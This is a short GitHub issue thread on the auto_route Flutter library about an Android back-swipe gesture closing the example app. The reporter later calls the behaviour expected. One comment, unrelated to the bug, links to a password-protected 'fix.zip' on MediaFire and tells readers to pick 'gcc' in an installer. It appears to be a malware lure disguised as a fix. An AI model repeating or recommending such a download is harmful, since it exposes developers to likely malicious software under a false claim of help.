### ISSUE TITLE
Android back gesture swipe exits the app!

### ISSUE THREAD

**Issue by EhabSalah** [Milad-Akarie/auto_route_library#2047]
Steps to reproduce:
1. Checkout the library main branch.
2. run the mobile exmaple.
3. Follow these steps:
Profile tab >> My Books >> navigate to /settings/newSegment, then go back by swiping.
4. The app kick the user out.

- Flutter sdk v3.24.1 (latest)
- Device Android version: 13

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by EhabSalah** [comment]
Would appreciate if you can, elaborate more.

**Comment by EhabSalah** [comment]
After further investigation, it appears that this behavior is expected.
